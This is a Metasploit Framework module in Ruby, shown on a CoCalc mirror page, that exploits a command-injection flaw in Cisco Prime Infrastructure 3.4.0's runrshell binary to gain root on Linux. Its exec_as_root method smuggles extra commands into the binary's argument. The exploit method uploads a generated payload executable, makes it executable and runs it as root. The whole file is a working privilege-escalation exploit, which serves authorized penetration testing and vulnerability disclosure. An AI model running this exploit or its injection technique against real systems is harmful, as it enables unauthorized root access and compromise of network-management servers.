Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Msf::Post::File
10
include Msf::Exploit::EXE
11
include Msf::Exploit::FileDropper
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',
18
'Description' => %q{
19
This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The
20
runrshell binary is meant to execute a shell script as root, but can be abused to inject
21
extra commands in the argument, allowing you to execute anything as root.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [
25
'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery
26
'sinn3r' # Metasploit module
27
],
28
'Platform' => ['linux'],
29
'Arch' => [ARCH_X86, ARCH_X64],
30
'SessionTypes' => ['shell', 'meterpreter'],
31
'DisclosureDate' => '2018-12-08',
32
'Privileged' => true,
33
'References' => [
34
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],
35
],
36
'Targets' => [
37
[ 'Cisco Prime Infrastructure 3.4.0', {} ]
38
],
39
'DefaultTarget' => 0,
40
'Notes' => {
41
'Reliability' => UNKNOWN_RELIABILITY,
42
'Stability' => UNKNOWN_STABILITY,
43
'SideEffects' => UNKNOWN_SIDE_EFFECTS
44
}
45
)
46
)
47
48
register_advanced_options [
49
OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])
50
]
51
end
52
53
def exec_as_root(cmd)
54
command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'"
55
vprint_status(cmd_exec(command_string))
56
end
57
58
def exploit
59
payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"
60
exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)
61
print_status("Uploading #{exe_path}")
62
write_file(exe_path, generate_payload_exe)
63
unless file?(exe_path)
64
print_error("Failed to upload #{exe_path}")
65
return
66
end
67
68
register_file_for_cleanup(exe_path)
69
print_status('chmod the file with +x')
70
exec_as_root("/bin/chmod +x #{exe_path}")
71
print_status("Executing #{exe_path}")
72
exec_as_root(exe_path)
73
end
74
end
75
76